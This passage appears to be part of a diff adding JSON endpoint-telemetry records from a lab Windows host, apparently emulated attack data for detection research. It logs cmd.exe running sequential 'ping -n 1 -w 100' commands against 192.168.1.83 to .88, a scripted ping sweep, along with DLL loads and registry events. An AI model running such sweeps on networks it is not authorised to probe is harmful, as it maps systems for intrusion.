"PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": 
"{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "process", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572381990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.83", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3912, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572382190000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": 
"{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382300000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "process", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572386830000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.84", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6280, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572387029984, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": 
"{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "process", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572391990000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.85", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2900, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572392150000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": 
"{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883572396050000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + 
"timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572396830000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.86", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4696, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572397060000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": 
"ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4696, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883572400270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883572400270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 4696, 
+ "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572401830000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.87", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7372, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572401980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": 
"{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 
"C:\\Windows\\System32\\mswsock.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "process", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572406830000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.88", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { 
+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572406980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6788, + "process_name": "PING.EXE", + "process_path": 